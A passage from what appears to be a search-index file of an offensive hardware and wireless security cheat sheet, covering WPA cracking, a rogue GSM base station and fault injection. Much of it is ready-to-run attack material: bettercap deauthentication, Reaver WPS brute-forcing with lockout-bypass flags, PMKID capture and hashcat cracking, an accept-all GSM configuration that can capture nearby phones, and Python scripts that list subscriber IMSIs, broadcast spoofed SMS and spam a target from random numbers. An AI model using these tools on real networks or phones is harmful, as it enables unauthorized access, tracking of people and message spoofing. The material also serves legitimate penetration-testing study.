attack_db \n</code></pre>"},{"location":"protocols/wifi/wifi-wpa/#cracking-wpa-with-bettercap","title":"Cracking WPA with bettercap","text":"<ul> <li> <p>Install Bettercap <pre><code># install and update\ngo get github.com/bettercap/bettercap\ncd $GOPATH/src/github.com/bettercap/bettercap\nmake build && sudo make install\nsudo bettercap -eval \"caplets.update; q\"\n</code></pre></p> </li> <li> <p>Scan for Wifi networks <pre><code># run and recon the wifi APs\nsudo bettercap -iface wlan0\n# this will set the interface in monitor mode and start channel hopping on all supported frequencies\n> wifi.recon on \n# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`\n> set wifi.show.sort clients desc\n# every second, clear our view and present an updated list of nearby WiFi networks\n> set ticker.commands 'clear; wifi.show'\n> ticker on\n# use the good channel\n> wifi.recon.channel 1\n</code></pre></p> </li> <li> <p>Execute the deauth attack <pre><code># use the bssid of the AP\n> wifi.deauth e0:xx:xx:xx:xx:xx\n/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx\n/path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'\n</code></pre></p> </li> </ul>"},{"location":"protocols/wifi/wifi-wpa/#wpa-wps-attack","title":"WPA WPS Attack","text":"<pre><code>airmon-ng start wlan0\nairodump-ng mon0\n\n# Install\napt-get -y install build-essential libpcap-dev aircrack-ng pixiewps\ngit clone https://github.com/t6x/reaver-wps-fork-t6x\napt-get install reaver\n\n# Reaver integrated dumping tool (can also airodump-ng)\n# Wash gives information about WPS being locked or not\n# Locked WPS will have less success chances\nwash -i mon0 \n\n# Launch Reaver\nreaver -i mon0 -b $AP_MAC -vv -S\nreaver -i mon0 -c <Channel> -b $AP_MAC -p <PinCode> -vv -S\nreaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv\n\n\n# Now using pixiexps, you can crack PIN offline\npixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>\n# Then, you can use the PIN with reaver to get to cleartext password\nreaver -i <monitor interface> -b <bssid> -c <channel> -p <PIN>\n\n\n# Some manufacturers have implemented protections\n# You can try different switches to bypass\n# -L = Ignore locked state\n# -N = Don't send NACK packets when errors are detected\n# -d = delay X seconds between PIN attempts\n# -T = set timeout period to X second (.5 means half second)\n# -r = After X attemps, sleep for Y seconds\nreaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15\n</code></pre> <p>Message \"WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying\" -> AP is protected Message \"WARNING: Receive timeout occured\" -> AP is too far</p>"},{"location":"protocols/wifi/wifi-wpa/#wpa-pmkid-attack","title":"WPA PMKID Attack","text":"<pre><code>INTERFACE=$(ifconfig | grep wlp | cut -d\":\" -f1) # mon0\n\n# PMKID capture\n# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID. \n# It can take a while to capture PKMID (several minutes++)\n# We recommend running hcxdumptool up to 10 minutes before aborting.\n# If an AP recieves our association request packet and supports sending \n# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1\nPMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2)\necho $PMKID|grep 'FOUND PMKID' &> /dev/null\nhcxpcaptool -z test.16800 test.pcapng\n\n# Then convert the captured data to a suitable format for hashcat\n# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)\n# -I retrieve identities from WiFi-traffic\n# -U retrieve usernames from WiFi-traffic\n# PMKID*MAC AP*MAC Station*ESSID\n# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a\nhcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng\n\n# Cracking the HASH\nhashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'\nhashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt \n\n# Check clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR\n</code></pre> <p>Bettercap WPA - PMKID attack</p> <pre><code>wifi.assoc all\n/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap\n/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'\n</code></pre>"},{"location":"protocols/wifi/wifi-wpa/#references","title":"References","text":"<ul> <li>TODO</li> </ul>"},{"location":"radio-frequency/limesdr-bts/","title":"GSM Network: LimeSDR","text":"<p>DISCLAIMER: This procedure is highly illegal basically anywhere in the world. Be sure to run this in a closed RF environment (also know as Faraday Cage)</p> <ul> <li>Running a GSM Station with osmo network-in-a-box (sms/audio)</li> <li>Running a GSM Station with full osmo (sms/audio/data) [TODO]</li> </ul>"},{"location":"radio-frequency/limesdr-bts/#running-a-gsm-station-with-osmo-network-in-a-box","title":"Running a GSM Station with osmo network-in-a-box","text":"<p>For this example we will use the Osmocom GSM Stack in the NITB (Network in the box) mode. In this mode the phones connected to you BTS will be able to call each other and send SMS messages. There is also the Interconnect mode in which the BSC (Base Station Controller) connects to a ISDN or IPBX (for example Asterisk) to manage the connected phones. You can check the different modes here: https://osmocom.org/projects/openbsc/wiki/OpenBSC#Configurations-Modes</p> <p>For this article I will be using a Ubuntu 18.04 LTS as operating system since there are pre-compiled packages from LimeMicro that helps a lot. It should run in any linux distribution provided that it has the required packages and / or you compile the missing ones. I might make a tutorial later about how to install from the source code but for now I will stick to the pre-compiled packages.</p>"},{"location":"radio-frequency/limesdr-bts/#installing-the-required-packages","title":"Installing the required packages","text":"<p>The first thing we need to do is to install all required packages. LimeMicro did a nice work and gathered everything pre compiled in their PPAs. So let\u2019s add them first:</p> <pre><code>sudo add-apt-repository -y ppa:myriadrf/drivers\nsudo add-apt-repository -y ppa:myriadrf/gnuradio\n</code></pre> <p>Let\u2019s also add the osmocom binary builds:</p> <pre><code>wget https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/Release.key\nsudo apt-key add Release.key\nrm Release.key\necho \"deb [https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/](https://download.opensuse.org/repositories/network:/osmocom:/latest/xUbuntu_18.04/) ./\" | sudo tee /etc/apt/sources.list.d/osmocom-latest.list\nsudo apt-get update\n</code></pre> <p>Then we can install required packages:</p> <pre><code>sudo apt install osmocom-nitb osmo-trx-lms osmo-bts-trx limesuite\n</code></pre> <p>These packages are:</p> <ul> <li><code>osmocom-nitb</code> => Network in a Box Package. Contains all needed stuff for managing GSM Network</li> <li><code>osmo-bts-trx</code> => The Base Transceiver Station software that manages how the network packets will be sent.</li> <li><code>osmo-trx-lms</code> => The LimeSDR \u201cfrontend\u201d for the BTS. This is the piece of software that actually communicates with LimeSDR</li> <li><code>limesuite</code> => The software and driver for the LimeSDR</li> </ul>"},{"location":"radio-frequency/limesdr-bts/#updating-the-limesdr-firmware","title":"Updating the LimeSDR Firmware","text":"<p>It is a good pratice to check if your LimeSDR firmware is up to date. To check and update if needed, you only need to run:</p> <pre><code>LimeUtil --update\n</code></pre> <p>It should do everything that is needed to update</p>"},{"location":"radio-frequency/limesdr-bts/#creating-the-configuration-files","title":"Creating the configuration files","text":"<p>There are few files that need to be created. Let\u2019s first start with the OpenBSC config file openbsc.cfg:</p> <p><pre><code>!\n! OpenBSC configuration saved from vty\n! !\npassword foo\n!\nline vty\n no login\n!\ne1_input\n e1_line 0 driver ipa\nnetwork\n network country code 901\n mobile network code 70\n short name HUEHUE\n long name HUEBRNetwork\n auth policy accept-all\n location updating reject cause 13\n encryption a5 0\n neci 1\n rrlp mode none\n mm info 1\n handover 0\n handover window rxlev averaging 10\n handover window rxqual averaging 1\n handover window rxlev neighbor averaging 10\n handover power budget interval 6\n handover power budget hysteresis 3\n handover maximum distance 9999\n bts 0\n type sysmobts\n band GSM900\n cell_identity 0\n location_area_code 1\n training_sequence_code 7\n base_station_id_code 63\n ms max power 15\n cell reselection hysteresis 4\n rxlev access min 0\n channel allocator ascending\n rach tx integer 9\n rach max transmission 7\n ip.access unit_id 1801 0\n oml ip.access stream_id 255 line 0\n gprs mode none\n trx 0\n rf_locked 0\n arfcn 100\n nominal power 23\n max_power_red 20\n rsl e1 tei 0\n timeslot 0\n phys_chan_config CCCH+SDCCH4\n timeslot 1\n phys_chan_config SDCCH8\n timeslot 2\n phys_chan_config TCH/F\n timeslot 3\n phys_chan_config TCH/F\n timeslot 4\n phys_chan_config TCH/F\n timeslot 5\n phys_chan_config TCH/F\n timeslot 6\n phys_chan_config TCH/F\n timeslot 7\n phys_chan_config TCH/F\n</code></pre> There are several parameters here, but I will only describe the ones you might want to change:</p> <pre><code>network country code 901\nmobile network code 70\nshort name HUEHUE\nlong name HUEBRNetwork\nauth policy accept-all\n</code></pre> <ul> <li><code>network country code</code> => That is the MCC of the network operator. It says in which country the operator is operating. For example: 724 is Brazil</li> <li><code>mobile network code</code> => That is the MNC of the network operator. It says which network operator it is. Every mobile network operator has its own MNC (some of them have more than one).</li> <li><code>short name</code> => The Short name of the network operator</li> <li><code>long name</code> => The Long Name of the network operator</li> <li><code>auth policy</code> => How we will accept the phones that are trying to connect.</li> </ul> <p>Be careful setting these settings specially with a accept-all policy. If you set to an existing mobile operator, any phone that is close to your LimeSDR will connect to it. The names of the operator (at least in a Android Device) only appears after connecting to it.</p> <p>That openbsc.cfg file will be used by osmo-nitb software. The next file is osmo-bts.cfg</p> <pre><code>!\n! OsmoBTS configuration example\n!!\n!\nlog stderr\n logging color 1\n logging timestamp 0\n logging level rsl notice\n logging level oml notice\n logging level rll notice\n logging level rr notice\n logging level loop debug\n logging level meas debug\n logging level pag error\n logging level l1c error\n logging level l1p error\n logging level dsp error\n logging level abis error\n\n!\nline vty\n no login\n!\nphy 0\n instance 0\n osmotrx rx-gain 40\n osmotrx tx-attenuation 50\n osmotrx ip local 127.0.0.1\n osmotrx ip remote 127.0.0.1\n no osmotrx timing-advance-loop\nbts 0\n oml remote-ip 127.0.0.1\n ipa unit-id 1801 0\n gsmtap-sapi pdtch\n gsmtap-sapi ccch\n band 900\n trx 0\n phy 0 instance 0\n</code></pre> <p>The only importante parameter here to take care is band. Make sure is the same as in openbsc.cfg file. The next one is osmo-trx.cfg which will be used by osmo-trx-lms:</p> <pre><code>log stderr\n logging filter all 1\n logging color 1\n logging print category 1\n logging timestamp 1\n logging print file basename\n logging level set-all info\n!\nline vty\n no login\n!\ntrx\n bind-ip 127.0.0.1\n remote-ip 127.0.0.1\n base-port 5700\n egprs disable\n tx-sps 4\n rx-sps 4\n rt-prio 18\n chan 0\n tx-path BAND1\n rx-path LNAW\n</code></pre> <p>There are not much to change here. If you\u2019re using a multi-port LimeSDR (like LimeSDR USB or PCIe) you can change the parameter tx-path and rx-path to the desired paths.</p>"},{"location":"radio-frequency/limesdr-bts/#running-the-software-stack","title":"Running the software stack","text":"<p>There are a few programs to run to get the BTS working. You should run all of them from the folder you created the configuration files.</p> <p>The first one we should run is osmo-trx-lms . This one should be ran as root to enable high priority scheduling (specially needed if you\u2019re running a small SBC like a Raspberry PI).</p> <pre><code>sudo osmo-trx-lms\n</code></pre> <p></p> <p>The second one is the osmo-nitb which is the base station controller. This one doesn\u2019t need to be ran as root.</p> <pre><code>osmo-nitb\n</code></pre> <p></p> <p>And the last software is the osmo-bts-trx which handles the transceiver:</p> <pre><code>osmo-bts-trx\n</code></pre> <p></p> <p>Now your base station should be running.</p>"},{"location":"radio-frequency/limesdr-bts/#testing-the-base-station","title":"Testing the Base Station","text":"<p>The best way to test is to have a custom simcard like this one:</p> <p></p> <p>But since we set the BTS to accept-all mode, you can just go to your phone network settings and select the created network. That will work fine if you have an Android phone which allows you to select custom networks:</p> <p></p> <p>Here is the network I just created with MCC 724 and MNC 70. In some simcards it is required that the MCC is the same as sim country (for example here it only shows if the network is at 724).</p> <p>After connecting to the network, the name should appear instead of the MCC+MNC code:</p> <p></p>"},{"location":"radio-frequency/limesdr-bts/#listing-subscribers","title":"Listing Subscribers","text":"<p>There is a simple python script to list the subscribers. What it does is to open the sqlite database and do a simple query and print.</p> <pre><code>#!/usr/bin/env python\nimport sqlite3\n\nHLR_DATABASE = \"hlr.sqlite3\"\ndb = sqlite3.connect(HLR_DATABASE)\nc = db.cursor()\nc.execute(\"SELECT * FROM Subscriber\")\n\nprint \"ID\\t\\tcreated\\t\\tIMSI\\t\\t\\tTMSI\\t\\textension\\n\"\nwhile 1:\n subscriber = c.fetchone()\n if not subscriber:\n break\n\n print \"{0:1}\\t{1:2}\\t{2:<15}\\t\\t{3:<10}\\t{4}\".format(\n subscriber[0],\n subscriber[1],\n subscriber[3],\n subscriber[7],\n subscriber[5]\n )\n\ndb.close()\n</code></pre> <p>The IMSI field is unique to that phone / simcard combination. That\u2019s the number you can use to track a specific user around the world. The extension is the assigned phone number for that specific phone.</p>"},{"location":"radio-frequency/limesdr-bts/#sending-sms","title":"Sending SMS","text":"<p>There are two scripts I found in the internet to send SMS. They basically selects the IMSI from the sqlite database the Osmo stack creates and then connects through the telnet interface to issue the desired commands. One of them is sms_broadcast.py:</p> <pre><code>#!/usr/bin/env python\nimport telnetlib\nimport sqlite3\nimport sys\n\nimsi = 999999999999999\nHLR_DATABASE = \"hlr.sqlite3\"\n\ndef check_extension(extension):\n conn.write(b\"show subscriber extension %s\\n\" % extension)\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"No subscriber found for extension\" in res:\n create_subscriber(extension)\n\ndef create_subscriber(extension):\n print(\"No user with excension %s found. Creating new...\" % extension)\n print(\"Extension: %s, IMSI: %d\" % (extension, imsi))\n\n conn.write(b\"show subscriber imsi %d\\n\" % imsi)\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"No subscriber found for imsi\" in res:\n conn.write(b\"subscriber create imsi %d\\n\" % imsi)\n conn.read_until(b\"OpenBSC> \")\n\n conn.write(b\"enable\\n\")\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"subscriber imsi %d extension %s\\n\" % (imsi, extension))\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"disable\\n\")\n conn.read_until(b\"OpenBSC> \")\n\ndef get_users():\n # returns user id list generator\n\n db = sqlite3.connect(HLR_DATABASE)\n c = db.cursor()\n c.execute(\"SELECT * FROM Subscriber\")\n\n for subscriber in c.fetchall():\n yield subscriber[0]\n\ndef send_sms(id, extension, message):\n conn.write(b\"subscriber id %d sms sender extension %s send %s\\n\" % (id, extension, message))\n res = conn.read_until(b\"OpenBSC> \")\n if b\"%\" in res:\n print(res)\n exit(1)\n\nif __name__ == \"__main__\":\n try:\n extension = sys.argv[1]\n message = \" \".join(sys.argv[2:])\n except:\n print(\"usage: ./sms_broadcast.py extension message\")\n print(\"This script sends a message from the specified extension (number) to all devices connected to this base station\")\n exit(1)\n\n conn = telnetlib.Telnet(\"127.0.0.1\", 4242)\n conn.read_until(b\"OpenBSC> \")\n\n check_extension(extension)\n\n for id in get_users():\n send_sms(id, extension, message)\n</code></pre> <p>This one is pretty simple to use:</p> <p><pre><code>python sms_broadcast.py \"source number\" \"message\"\n</code></pre> This will send an SMS to all connected devices as it was the source number.</p> <p>Another option is to target a single user:</p> <pre><code>#!/usr/bin/env python\nimport telnetlib\nimport sys\nimport random\nimport time\n\nimsi = 999999999999999\n\ndef check_extension(extension):\n conn.write(b\"show subscriber extension %s\\n\" % extension)\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"No subscriber found for extension\" in res:\n print(\"Phone with extension %s not found ;(\" % extension)\n exit(1)\n\ndef check_spam_subscriber():\n conn.write(b\"show subscriber imsi %d\\n\" % imsi)\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"No subscriber found for imsi\" in res:\n conn.write(b\"subscriber create imsi %d\\n\" % imsi)\n print(conn.read_until(b\"OpenBSC> \"))\n\ndef send(extension, spam_number, message):\n print(\"Sending sms from %d...\" % spam_number)\n\n conn.write(b\"enable\\n\")\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"subscriber imsi %d extension %d\\n\" % (imsi, spam_number))\n conn.read_until(b\"OpenBSC# \")\n conn.write(b\"disable\\n\")\n conn.read_until(b\"OpenBSC> \")\n\n conn.write(b\"subscriber extension %s sms sender extension %d send %s\\n\" % (extension, spam_number, message))\n res = conn.read_until(b\"OpenBSC> \")\n\n if b\"%\" in res:\n print(res)\n exit(1)\n\nif __name__ == \"__main__\":\n try:\n extension = sys.argv[1]\n repeats = int(sys.argv[2])\n message = \" \".join(sys.argv[3:])\n except:\n print(\"usage: ./sms_spam.py extension [num of repeats] message\")\n print(\"This script sends a message to specified number\")\n exit(1)\n\n conn = telnetlib.Telnet(\"127.0.0.1\", 4242)\n conn.read_until(b\"OpenBSC> \")\n\n check_extension(extension)\n check_spam_subscriber()\n\n for _ in range(repeats):\n spam_number = random.randint(1000,9999)\n send(extension, spam_number, message)\n time.sleep(2)\n</code></pre> <p>This one generates a random source number and sends the specified message n times.</p> <pre><code>python sms_spam.py \"target number\" \"number of times\" \"message\"\n</code></pre>"},{"location":"radio-frequency/limesdr-bts/#references","title":"References","text":"<ul> <li>Creating your own GSM Network with LimeSDR</li> <li>OpenBSC: Configuration Modes</li> <li>osmobsc vty reference</li> <li>LimeSDR</li> <li>Sysmocom Custom Simcard</li> </ul>"},{"location":"radio-frequency/sdr/","title":"SDR","text":""},{"location":"radio-frequency/sdr/#frequency-independent-sdr-based-signal-understanding-and-reverse-engineering","title":"Frequency Independent SDR-based Signal Understanding and Reverse Engineering","text":"<p>https://github.com/ainfosec/FISSURE</p>"},{"location":"secure-boot/","title":"Secure Boot","text":"<ul> <li>Secure Boot is a security feature implemented in modern computer systems, primarily in those using the Unified Extensible Firmware Interface (UEFI) firmware.</li> <li>Its main purpose is to ensure that only trusted and authenticated software is loaded during the boot process, protecting the system against unauthorized or malicious code that could compromise its integrity and security.</li> <li>During boot, UEFI Secure Boot checks the signature of each piece of boot software, including UEFI firmware drivers (also known as option ROMs), Extensible Firmware Interface (EFI) applications, and the operating system drivers and binaries. If the signatures are valid or trusted by the Original Equipment Manufacturer (OEM), the machine boots and the firmware gives control to the operating system.</li> </ul>"},{"location":"secure-boot/#references","title":"References","text":"<ul> <li>Windows UEFI Bootkit in Rust - memN0ps</li> <li>AzureDocs - Secure Boot - MicrosoftDocs</li> <li>Awesome UEFI Security - river-li</li> </ul>"},{"location":"side-channel/fault-injection/","title":"Fault Injection","text":""},{"location":"side-channel/fault-injection/#power-vcc-voltage-glitch","title":"Power / VCC - Voltage Glitch","text":"<p>Power glitch injection is a physical attack technique used to test and exploit vulnerabilities in electronic devices by causing controlled, temporary power disturbances. A VCC glitch, also known as a supply voltage glitch, is a specific type of power glitch attack targeting the voltage supply (VCC) of a microcontroller or integrated circuit (IC) in electronic devices.</p> <p>Most of the time the goal is one of the following:</p> <ul> <li>Re-enable debugging features (e.g: Trezor One wallet)</li> <li>Bypass secure boot</li> <li>Gain code-execution by glitching memcpy</li> </ul> <p>Tools</p> <ul> <li>Faultier FW</li> <li>PicoGlitcher v1.1</li> <li>HydraBus</li> <li>ChipWhisperer-Pro</li> <li>ChipWhisperer-Husky</li> </ul> <p>Voltage Glitching with Crowbars</p> <pre><code>import faultier\nimport serial\n\nft = faultier.Faultier()\nser = serial.Serial(ft.get_serial_path(), baudrate=115200)\nser.timeout = 0.3\n\nft.configure_glitcher(\n trigger_source = faultier.TRIGGER_IN_EXT0,\n trigger_type = faultier.TRIGGER_PULSE_POSITIVE\n glitch_output = faultier.OUT_CROWBAR\n)\nft.glitch(delay = 1000, pulse = 1)\nprint(ser.read(3))\n</code></pre> <p>Challenges</p> <ul> <li>Fiasco - Riscure Hardware CTF 2016 - solved using HydraBus + Custom Board with MOSFET <pre><code>gpio glitch trigger PB0 pin PC15 length 100 offsets 191200\ngpio glitch trigger PB0 pin PC15 length 100 offsets 191300\n</code></pre></li> <li>Fiesta - Riscure Hardware CTF 2016</li> <li>Hardware Power Glitch Attack (Fault Injection) - rhme2 Fiesta (FI 100) - solved using a custom code running on a Xilinx FPGA</li> <li>AVR Glitch: Modifying Code Execution Paths Using Only Voltage</li> <li>Hextree Glitch Tag - The Hextree GlitchTag is a \"totally not AirTag inspired\" board for the nRF52832 microcontroller. It is intended as a target for the Hextree Faultier. It gives access to all pins that you need to learn basic fault-injection, including glitch characterization and so on. It also allows you to reproduce LimitedResult's APPROTECT bypass (that was also used to hack the AirTags) without needing to microsolder!</li> </ul>"},{"location":"side-channel/fault-injection/#electromagnetic-fault","title":"Electromagnetic Fault","text":"<p>Electromagnetic Fault Injection is an advanced technique used in hardware security and testing, where electromagnetic pulses are used to induce faults in electronic devices</p> <p>Tools </p> <ul> <li>Create a custom Electromagnetic fault injection tool: Dirt cheap Electromagnetic Fault Injection</li> </ul> <p>Challenges</p> <ul> <li>Fiesta - Riscure Hardware CTF 2016 - pedro-javierf - solved using a custom EMFI</li> </ul>"},{"location":"side-channel/fault-injection/#clock-glitch","title":"Clock Glitch","text":"<p>This technique involves momentarily disrupting or altering the clock signal of a device to induce errors or malfunctions in its operation.</p> <p>Challenges</p> <ul> <li>Fiesta - Riscure Hardware CTF 2016 - jcldf - solved using a clock glitch</li> </ul>"},{"location":"side-channel/fault-injection/#pin2pwn","title":"Pin2pwn","text":"<p>pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle - Brad Dixon - Carve Systems - DEFCON 24</p> <p>In the case of an external SPI flash, it is possible for an attacker to short these pins :</p> <p></p> <p>The MCU will not be able to get data from the external flash and then show a stacktrace, get a shell in the bootloader or worst a root shell on the embedded Linux.</p> <p>Here is a practical example, putting a cable between MOSI and Chip Select :</p> <p></p>"},{"location":"side-channel/fault-injection/#references","title":"References","text":"<ul> <li>rhme-2016 write-up Fault Injection - hydrabus</li> <li>Solving rhme fiesta from Riscure Hardware CTF 2016 with EM Fault Injection - Dangling Pointr - 2020, Oct 11</li> <li>Hardware Power Glitch Attack (Fault Injection) - rhme2 Fiesta (FI 100) - LiveOverflow - 16 june 2017</li> <li>pin2pwn: How to Root an Embedded Linux Box with a Sewing Needle - Brad Dixon - Carve Systems - DEFCON 24</li> <li>Replicant: Reproducing a Fault Injection Attack on the Trezor One - Voidstar - AUGUST 2022</li> <li>Your first Glitch/Voltage Fault Injection - hextree.io</li> <li>PicoGlitcher PCB - A dirt chip fault-injection device</li> <li>Fault Injection using Crowbars on Embedded Systems - Colin O'Flynn</li> </ul>"}]} |